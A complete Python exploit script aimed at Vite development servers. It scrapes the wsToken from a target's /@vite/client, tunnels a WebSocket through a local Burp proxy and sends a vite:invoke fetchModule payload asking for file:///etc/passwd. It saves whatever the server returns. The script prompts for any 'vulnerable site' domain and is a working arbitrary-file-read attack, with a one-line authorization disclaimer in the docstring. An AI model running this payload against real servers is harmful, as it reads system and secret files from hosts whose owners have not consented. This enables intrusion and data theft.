"""Probe a Vite dev server's HMR WebSocket through a local Burp proxy.

The script:

1. downloads ``/@vite/client`` from the target through Burp and extracts
   the ``wsToken`` embedded in that JavaScript,
2. opens an HTTP ``CONNECT`` tunnel through Burp to the target,
3. performs a ``wss://`` handshake over that tunnel using the token, and
4. sends one ``vite:invoke`` / ``fetchModule`` message (see ``PAYLOAD``)
   and records whatever the server replies.

Results are written to ``all_messages.txt``, ``business_messages.txt`` and
``status.txt`` in the current working directory.

Only run this against systems you are explicitly authorized to test.

NOTE: ``asyncio.timeout`` is used below, which requires Python 3.11+.
"""

import asyncio
import json
import re
import socket
import ssl
import urllib.request
from pathlib import Path
from urllib.parse import urlparse

from websockets.asyncio.client import connect
from websockets.exceptions import ConnectionClosed, InvalidHandshake, InvalidStatus

# Local intercepting proxy (Burp) that all traffic is routed through.
BURP_HOST = "127.0.0.1"
BURP_PORT = 8080
BURP_PROXY = f"http://{BURP_HOST}:{BURP_PORT}"

# Target host is asked for at import time; surrounding whitespace is removed
# so that a stray space or newline does not end up inside every URL.
HOST = input("请你输入有漏洞的网站域名(例如:www.baidu.com):").strip()
PORT = 5173

HTTPS_ORIGIN = f"https://{HOST}:{PORT}"
REFERER = f"{HTTPS_ORIGIN}/"
VITE_CLIENT_URL = f"{HTTPS_ORIGIN}/@vite/client"

CONNECT_TIMEOUT = 10  # seconds: TCP connect, CONNECT exchange, WS handshake
MESSAGE_TIMEOUT = 5   # seconds to wait for each WebSocket message
MAX_MESSAGES = 20     # upper bound on messages read after sending PAYLOAD

# Browser-like request headers shared by the HTTP fetch and the WS handshake.
USER_AGENT = (
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
    "AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/147.0.7727.56 Safari/537.36"
)
ACCEPT_LANGUAGE = "zh-CN,zh;q=0.9,en-GB;q=0.8,en;q=0.7"

# The single message sent once the WebSocket is open.
PAYLOAD = {
    "type": "custom",
    "event": "vite:invoke",
    "data": {
        "name": "fetchModule",
        "id": "send:1",
        "data": ["file:///etc/passwd?raw"],
    },
}

# Tried in order; the first pattern that matches anywhere in the JS wins.
_WS_TOKEN_PATTERNS = (
    r'const\s+wsToken\s*=\s*["\']([^"\']+)["\']',
    r'let\s+wsToken\s*=\s*["\']([^"\']+)["\']',
    r'var\s+wsToken\s*=\s*["\']([^"\']+)["\']',
    r'wsToken\s*=\s*["\']([^"\']+)["\']',
)


def insecure_ssl_context() -> ssl.SSLContext:
    """Return an SSL context with certificate verification disabled.

    Used in the test environment so that Python accepts Burp's
    TLS-interception certificate. For real use, import the Burp CA
    instead of turning verification off.
    """
    ctx = ssl.create_default_context()
    # check_hostname must be cleared before verify_mode can be CERT_NONE.
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def fetch_vite_client_js() -> str:
    """Download ``/@vite/client`` from the target through Burp.

    Returns:
        The response body decoded as UTF-8 (undecodable bytes replaced).

    Raises:
        urllib.error.URLError: on connection, proxy or HTTP errors
            (propagated from ``opener.open``).
    """
    ctx = insecure_ssl_context()

    opener = urllib.request.build_opener(
        urllib.request.ProxyHandler({
            "http": BURP_PROXY,
            "https": BURP_PROXY,
        }),
        urllib.request.HTTPSHandler(context=ctx),
    )

    req = urllib.request.Request(
        VITE_CLIENT_URL,
        headers={
            "Host": f"{HOST}:{PORT}",
            "Origin": HTTPS_ORIGIN,
            "Referer": REFERER,
            "User-Agent": USER_AGENT,
            "Accept": "*/*",
            "Accept-Language": ACCEPT_LANGUAGE,
        },
    )

    print(f"[+] Fetching {VITE_CLIENT_URL} via Burp")

    with opener.open(req, timeout=CONNECT_TIMEOUT) as resp:
        body = resp.read().decode("utf-8", errors="replace")

    print(f"[+] /@vite/client length: {len(body)}")
    return body


def extract_ws_token(client_js: str) -> str:
    """Extract the ``wsToken`` value from the ``/@vite/client`` JavaScript.

    Args:
        client_js: Text of the ``/@vite/client`` response.

    Returns:
        The quoted string assigned to ``wsToken``.

    Raises:
        RuntimeError: if no assignment to ``wsToken`` can be found. Before
            raising, a snippet of the JS around the first ``wsToken`` (or,
            failing that, ``token``) occurrence is printed to help debugging.
    """
    for pattern in _WS_TOKEN_PATTERNS:
        match = re.search(pattern, client_js)
        if match:
            return match.group(1)

    idx = client_js.find("wsToken")
    if idx == -1:
        idx = client_js.find("token")

    print("[!] Could not extract wsToken automatically.")
    if idx != -1:
        print("[!] Nearby JS snippet:")
        print(client_js[max(0, idx - 300): idx + 500])

    raise RuntimeError("无法从 /@vite/client 中提取 wsToken")


def open_burp_connect_tunnel(host: str, port: int) -> socket.socket:
    """Open an HTTP ``CONNECT`` tunnel to ``host:port`` through Burp.

    Args:
        host: Target host name to tunnel to.
        port: Target TCP port to tunnel to.

    Returns:
        A connected socket, with its timeout cleared, on which the proxy
        has answered the ``CONNECT`` request with status 200.

    Raises:
        RuntimeError: if Burp closes the connection before a full response
            header arrives, or answers with a status other than 200.
        OSError: on connect/send/receive failures, including timeouts.

    The socket is closed before any exception leaves this function, so a
    failed attempt does not leak a file descriptor.
    """
    print(f"[+] Connecting to Burp: {BURP_HOST}:{BURP_PORT}")
    s = socket.create_connection((BURP_HOST, BURP_PORT), timeout=CONNECT_TIMEOUT)

    try:
        connect_req = (
            f"CONNECT {host}:{port} HTTP/1.1\r\n"
            f"Host: {host}:{port}\r\n"
            "Proxy-Connection: keep-alive\r\n"
            "\r\n"
        )

        print("[+] Sending CONNECT to Burp")
        s.sendall(connect_req.encode("ascii"))

        # Read until the blank line that terminates the response header.
        data = b""
        while b"\r\n\r\n" not in data:
            chunk = s.recv(4096)
            if not chunk:
                raise RuntimeError("Burp closed connection before CONNECT response")
            data += chunk

        header_text = data.decode("iso-8859-1", errors="replace")
        print("[+] Burp CONNECT response:")
        print(header_text)

        header_lines = header_text.splitlines()
        first_line = header_lines[0] if header_lines else ""

        # Compare the status-code field itself rather than searching for the
        # substring " 200 ": that also accepts a status line with an empty
        # reason phrase and cannot be fooled by "200" appearing elsewhere.
        status_fields = first_line.split(None, 2)
        if len(status_fields) < 2 or status_fields[1] != "200":
            raise RuntimeError(f"CONNECT failed: {first_line}")

        # The connect timeout only applies to the CONNECT exchange.
        s.settimeout(None)
    except BaseException:
        s.close()
        raise

    return s


async def recv_multiple(ws) -> list[str]:
    """Read up to ``MAX_MESSAGES`` messages from an open WebSocket.

    Reading stops early when no message arrives within ``MESSAGE_TIMEOUT``
    seconds, or when the connection is closed. In both cases the messages
    received so far are returned rather than discarded.

    Args:
        ws: An open websockets client connection.

    Returns:
        The received messages, in arrival order.
    """
    messages = []

    for i in range(MAX_MESSAGES):
        try:
            async with asyncio.timeout(MESSAGE_TIMEOUT):
                msg = await ws.recv()
        except TimeoutError:
            print(f"\n[+] No more messages after {MESSAGE_TIMEOUT}s")
            break
        except ConnectionClosed:
            # A close after (or instead of) a reply must not throw away
            # what was already received.
            print("\n[+] Connection closed; keeping messages received so far")
            break

        messages.append(msg)
        print(f"\n[RECV {i + 1}]")
        print(repr(msg))

    return messages


def is_connected_message(msg: str) -> bool:
    """Return True if ``msg`` is Vite's default ``connected`` message.

    A message counts as such when it parses as a JSON object whose
    ``"type"`` is ``"connected"``. Anything that is not valid JSON, or is
    valid JSON but not an object, yields False.
    """
    try:
        obj = json.loads(msg)
    except (TypeError, ValueError, RecursionError):
        return False
    return isinstance(obj, dict) and obj.get("type") == "connected"


def _write_status(status: str) -> None:
    """Record the outcome of the run as a single line in ``status.txt``."""
    Path("status.txt").write_text(f"{status}\n", encoding="utf-8")


async def connect_send_recv(ws_uri: str):
    """Handshake over a Burp tunnel, send ``PAYLOAD`` and save the replies.

    Args:
        ws_uri: The ``wss://`` URI (including the token query) to connect to.

    Side effects:
        Writes ``all_messages.txt`` and ``business_messages.txt`` on a
        successful exchange, and always writes ``status.txt`` with one of
        ``replied``, ``sent_no_reply``, ``handshake_failed`` or ``error``.

    Failures (including a failure to open the tunnel) are reported on
    stdout and via ``status.txt``; they are not re-raised.
    """
    parsed = urlparse(ws_uri)
    ws_host = parsed.hostname
    ws_port = parsed.port or 443

    ctx = insecure_ssl_context()

    try:
        # Opened inside the try block so that a tunnel failure is reported
        # through status.txt like every other error.
        tunnel_sock = open_burp_connect_tunnel(ws_host, ws_port)

        async with connect(
            ws_uri,
            # The tunnel is already established; do not proxy a second time.
            proxy=None,
            sock=tunnel_sock,

            # WSS + Burp TLS
            ssl=ctx,
            server_hostname=ws_host,

            open_timeout=CONNECT_TIMEOUT,
            close_timeout=5,
            ping_interval=None,

            origin=HTTPS_ORIGIN,
            subprotocols=["vite-hmr"],
            compression=None,

            user_agent_header=USER_AGENT,
            additional_headers={
                "Accept": "*/*",
                "Accept-Language": ACCEPT_LANGUAGE,
                "Referer": REFERER,
            },
        ) as ws:
            print("[+] WebSocket HANDSHAKE OK")
            print("[+] URI:", ws_uri)
            print("[+] Selected subprotocol:", ws.subprotocol)

            print("\n[REQUEST HEADERS]")
            print(ws.request.headers)

            print("\n[RESPONSE HEADERS]")
            print(ws.response.headers)

            message = json.dumps(PAYLOAD, ensure_ascii=False, separators=(",", ":"))

            print("\n[SENT]")
            print(message)

            await ws.send(message)

            messages = await recv_multiple(ws)

            # "Business" messages are everything except the default
            # connected notification.
            business_messages = [
                msg for msg in messages
                if not is_connected_message(msg)
            ]

            Path("all_messages.txt").write_text(
                "\n\n".join(str(m) for m in messages),
                encoding="utf-8",
            )

            Path("business_messages.txt").write_text(
                "\n\n".join(str(m) for m in business_messages),
                encoding="utf-8",
            )

            _write_status("replied" if messages else "sent_no_reply")

            print("\n[+] Summary")
            print(f"Total messages: {len(messages)}")
            print(f"Business messages excluding connected: {len(business_messages)}")
            print("Saved: all_messages.txt")
            print("Saved: business_messages.txt")
            print("Saved: status.txt")

    # InvalidStatus is handled before the more general InvalidHandshake so
    # that the HTTP response details can be shown.
    except InvalidStatus as e:
        print("[!] HANDSHAKE FAILED: InvalidStatus")

        response = getattr(e, "response", None)
        if response is not None:
            print("Status:", getattr(response, "status_code", None))
            print("Reason:", getattr(response, "reason_phrase", None))
            print("Headers:")
            for k, v in response.headers.raw_items():
                print(f"{k}: {v}")

        _write_status("handshake_failed")

    except InvalidHandshake as e:
        print("[!] HANDSHAKE FAILED: InvalidHandshake")
        print(repr(e))
        _write_status("handshake_failed")

    except Exception as e:
        # Top-level boundary of the script: report and record, do not crash.
        print("[!] ERROR")
        print(type(e).__name__, repr(e))
        _write_status("error")


async def main():
    """Fetch the client JS, extract the token and run the WebSocket exchange."""
    client_js = fetch_vite_client_js()
    ws_token = extract_ws_token(client_js)

    print("[+] Extracted wsToken:", ws_token)

    ws_uri = f"wss://{HOST}:{PORT}/?token={ws_token}"
    print("[+] Trying WS URI:", ws_uri)

    await connect_send_recv(ws_uri)


if __name__ == "__main__":
    asyncio.run(main())